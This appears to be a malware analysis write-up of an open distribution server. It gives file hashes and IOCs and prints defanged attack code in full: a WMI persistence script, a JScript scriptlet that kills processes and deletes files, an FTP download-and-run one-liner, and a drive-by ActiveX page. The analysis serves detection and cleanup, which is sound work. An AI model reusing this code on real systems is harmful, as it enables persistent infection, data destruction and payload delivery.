List all files (open directory listing on the distribution host — URL defanged; only fetch it from an isolated analysis environment):
hxxp://dwn[.]rundll32[.]ml:88/?tpl=list&folders-filter=&recursive

Download all files as a tarball (same caveat):
hxxp://dwn[.]rundll32[.]ml:88/?mode=archive&recursive

File list (MD5; the x/y figure appears to be the multi-engine AV detection count at the time of analysis, 0/0 meaning no result was available; the last column is the analyst's verdict):
3.zip                  password-protected zip; John the Ripper did not recover the password
321.exe                6bbf24496ba12ae8f636a926090ccfee (43/67) Miner
32ja.exe               00bca411dca23f4588c92f71e3eb439b (51/68) Doublepulsar
32k.exe                7af20530a799302b069d2d44e9d879d4 (0/0) Unknown file
33.zip                 password-protected zip; John the Ripper did not recover the password
64.exe                 1c72566993cdc1aeeae1b9730f70d805 (34/67) BitMiner?
64ja.exe               a7df6218c11c5010016138c31d7b51b1 (47/68) Doublepulsar
64k.exe                67a0c1945293c2223496a105b95429ac (0/0) Unknown file
a.exe                  c2e33815dadae01d21b2367b5d061ff6 (37/68) BitMiner?
DownloaderActiveX.cab  8fd32442a54c1e5f71345b037f03365a (33/57) Downloader (the ActiveX control instantiated by map.htm, below)
ie.swf                 79983f8e633cba9af29ef4d8850ff887 (0/0) Unknown
java.exe               c9185ef6f065dfd97d17933d67ef6eac (52/67) Gamethief Magania (the file map.htm downloads and runs)
kill.html              See below
map.htm                See below
mof.ps1                See below
mof.txt                See below
n.exe                  6ba244dd937bc848864583b5d38c8c2c (0/0) Unknown
pgmysql                320399ae49e97e5368de08b777332e5f (0/0) Unknown ELF file
we32.exe               6bbf24496ba12ae8f636a926090ccfee Same as 321.exe (identical MD5)
we64.exe               1c72566993cdc1aeeae1b9730f70d805 Same as 64.exe (identical MD5)
Note that the same binaries are served under several names, so blocking on file name is pointless; block on hash and on the host/path IOCs below.

---
kill.html contents:
Format (per the JScript in mof.txt, below), one entry per CRLF-separated line: <process image name> <file path> <flag>. For each entry the scriptlet runs `taskkill /f /im <image name>` and, when the flag is 0, deletes the file at <path>. This is a competitor-removal list: it terminates and wipes other miners and implants (e.g. NsCpuCNMiner64.exe, Mining.exe) before the operator's own payload is installed. The first two entries use wildcards (C:\*.exe); FileSystemObject.DeleteFile accepts wildcards in the last path component, so they remove every .exe in the root of C:\ and kill every rundll32.exe / ntvdm.exe instance. Every path here is a host-based IOC worth sweeping for.
rundll32.exe C:\*.exe 0
ntvdm.exe c:\*.exe 0
lsmo1.exe c:\windows\help\lsmox.exe 0
taskmgr.exe c:\windows\ntuhost.exe 0
lsmosee1.exe c:\windows\debug\lsmoseex.exe 0
lsmose1.exe c:\windows\debug\0621.exe 0
wowsiu.exe c:\windows\wowsiu.exe 0
Tnteime.exe c:\windows\fonts\Tnteime.exe 0
rmfxys.exe c:\windows\rmfxys.exe 0
hz64.exe C:\Windows\debug\hzwk\hz64.exe 0
gymaye.exe c:\windows\gymaye.exe 0
NsCpuCNMiner64.exe c:\windows\debug\wk\NsCpuCNMiner64.exe 0
mscorsvw.exe c:\windows\debug\wk\mscorsvw.exe 0
mssecsvc.exe c:\windows\mssecsvc.exe 0
lsmosee.exe c:\windows\help\lsmosee.exe 0
lsmose.exe c:\windows\debug\lsmose.exe 0
w1ninit.exe c:\programdata\microsoft\dhcq\w1ninit.exe 0
winin1t.exe c:\programdata\microsoft\dhcq\winin1t.exe 0
Mining.exe %ProgramFiles%\mining.exe 0

---
map.htm contents:
Obfuscated JavaScript. Decoded, it is the HTML below: it loads a remote script from cs[.]cskick[.]cn and embeds a zero-size DownloaderActiveX control (CLSID c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61, supplied by the DownloaderActiveX.cab listed above) whose propDownloadUrl points at java.exe (the Gamethief sample) with propPostdownloadAction set to "run" — a download-and-execute drive-by for any browser that still permits the control. Decoded content:
<script src=hxxp://cs[.]cskick[.]cn/cs/c.js></script></html></script></body><BODY><OBJECT ID=\"DownloaderActiveX1\" WIDTH=\"0\" HEIGHT=\"0\" CLASSID=\"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61\" CODEBASE=\"DownloaderActiveX.cab#Version=1,0,0,1\"><PARAM NAME=\"propProgressbackground\" VALUE=\"#bccee8\"><PARAM NAME=\"propTextbackground\" VALUE=\"#f7f8fc\"><PARAM NAME=\"propBarColor\" VALUE=\"#df0203\"><PARAM NAME=\"propTextColor\" VALUE=\"#000000\"><PARAM NAME=\"propWidth\" VALUE=\"0\"><PARAM NAME=\"propHeight\" VALUE=\"0\"><PARAM NAME=\"propDownloadUrl\" VALUE=\"hxxp://windows[.]rundll32[.]ml:88/java.exe\"><PARAM NAME=\"propPostdownloadAction\" VALUE=\"run\"><PARAM NAME=\"propInstallCompleteUrl\" VALUE=\"\"><PARAM NAME=\"propbrowserRedirectUrl\" VALUE=\"\"><PARAM NAME=\"propVerbose\" VALUE=\"0\"><PARAM NAME=\"propInterrupt\" VALUE=\"0\"></OBJECT></script></body></html>

Note: hxxp://cs[.]cskick[.]cn was unreachable at the time of writing.

---
mof.ps1 contents (a WMI permanent event subscription that periodically executes a remote scriptlet; annotated):
# Persistence via a WMI permanent event subscription: an __EventFilter, an
# ActiveScriptEventConsumer and a __FilterToConsumerBinding, all in root\subscription.
# Writing to root\subscription normally requires administrative rights.
# The object names 'filtP1' / 'consP1' are host IOCs. Hunt and clean up with:
#   Get-WmiObject -Namespace root\subscription -Class __EventFilter
#   Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer
#   Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding
# (pipe each matching object to Remove-WmiObject; remove the binding as well, otherwise
# re-creating either half re-arms the subscription).
$filterName = 'filtP1'
$consumerName = 'consP1'
# Consumer payload: JScript that uses the COM "script:" moniker to fetch the remote
# scriptlet (mof.txt, below) over HTTP and execute it directly — nothing needs to be
# written to disk as a script file. The doubled "" inside the PowerShell string
# produce literal double quotes in the JScript.
$Command ="GetObject(""script:hxxp://windows[.]rundll32[.]tk:88/mof.txt"")"

# Trigger: an intrinsic modification event on Win32_LocalTime when Minute=30 and
# Second=30, i.e. nominally once per hour. WITHIN 60 sets a 60-second polling interval,
# so matching an exact Second value is unreliable and the consumer may fire only
# intermittently — do not rely on the cadence when building a timeline.
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance Isa 'Win32_LocalTime' And TargetInstance.Minute = 30 And TargetInstance.Second =30"

# The filter lives in root\subscription but watches events in root\cimv2.
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop

# The consumer runs $Command under the JScript engine when the filter fires
# (typically hosted by the WMI script consumer process, scrcons.exe).
$WMIEventConsumer = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ScriptingEngine='JScript';ScriptText=$Command}

# The binding is what actually arms the subscription; filter and consumer on their own
# do nothing.
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

Note: hxxp://windows[.]rundll32[.]tk:88 appears to be an older address; it was unreachable at the time of writing. The same hostname is used inside mof.txt to fetch kill.html, so an existing infection whose scriptlet was already loaded may keep failing silently rather than re-arming.

---
mof.txt contents (the Windows Script Component fetched by the WMI consumer above; annotated):
<?xml version="1.0"?>
<!-- Windows Script Component (scriptlet) loaded via GetObject("script:...") from the
     WMI ActiveScriptEventConsumer in mof.ps1. Its JScript runs inside the hosting
     script consumer process each time the subscription fires. -->

<package>
<component id="testCalc">

<script language="JScript">
<![CDATA[
// Unused in the visible code.
var toff = 3000;
// Stage 1: fetch the kill list from the same C2 host that served this scriptlet.
var url1 = "hxxp://windows[.]rundll32[.]tk:88/kill.html";
http = new ActiveXObject("Msxml2.serverXMLHTTP");
fso = new ActiveXObject("Scripting.FilesystemObject");
wsh = new ActiveXObject("WScript.Shell");
// Synchronous GET; if the host is down this throws and the scriptlet aborts here.
http.open("GET",url1, false);
http.send();
str = http.responseText;
// kill.html is parsed as CRLF-separated lines of "<image name> <path> <flag>".
arr = str.split("\r\n");
for (i = 0; i < arr.length; i++) {
t = arr[i].split(" ");
proc = t[0];
path = t[1];
dele = t[2];
// Force-kill every process with that image name (window style 0 = hidden, wait for exit) ...
wsh.Run("taskkill /f /im " + proc, 0, true);
// ... and, when the flag is 0, delete the file (force=true clears read-only attributes;
// DeleteFile accepts wildcards, so the "C:\*.exe" entries remove every .exe in that
// directory). Failures are swallowed.
if (dele == 0) {
try {
fso.DeleteFile(path, true);
} catch (e) {}
}
};
// Stage 2: enumerate running processes via WMI and concatenate their names into t.
// (var t is hoisted, so t starts out holding the last split() array from the loop above
// rather than undefined; the string still works for the indexOf check below.)
var t;
var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
wsh1 = new ActiveXObject("WScript.Shell");
var service = locator.ConnectServer(".");
var properties = service.ExecQuery("SELECT * FROM Win32_Process");
var np = new Enumerator (properties);
for (;!np.atEnd();np.moveNext())
{
t=t + np.item().Name + "\n";
}

// Infection marker: if the implant (ieplare.exe) is already running, do nothing.
if(t.indexOf("ieplare.exe") > -1){

}else{

// Otherwise write an ftp.exe script file named "ps" in the current directory, log in to
// the C2 FTP service on port 25 as user "test" / password "1433", download s.rar as
// C:\Windows\ieplare.exe and c.rar as C:\Windows\config.json, delete the script and start
// the binary. A config.json beside the executable is consistent with a miner, but the
// payload itself is not shown here. Host IOCs: C:\Windows\ieplare.exe,
// C:\Windows\config.json; network IOC: outbound FTP (ftp.exe) to 25/tcp.
wsh1.Run("cmd /c echo open ftp[.]rundll32[.]tk 25>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\\windows\\ieplare.exe>>ps&echo get c.rar c:\\windows\\config.json>>ps&echo bye>>ps&ftp -s:ps&del ps&start c:\\windows\\ieplare.exe");
}
]]>
</script>

</component>
</package>

Note: the FTP drop site ftp[.]rundll32[.]tk on port 25 (credentials test / 1433, as embedded in the script above) was unreachable at the time of writing. The non-standard port is itself a detection opportunity: ftp.exe making an outbound connection to 25/tcp, or a process writing and then reading a file named "ps" in a system directory, should not happen on a healthy host.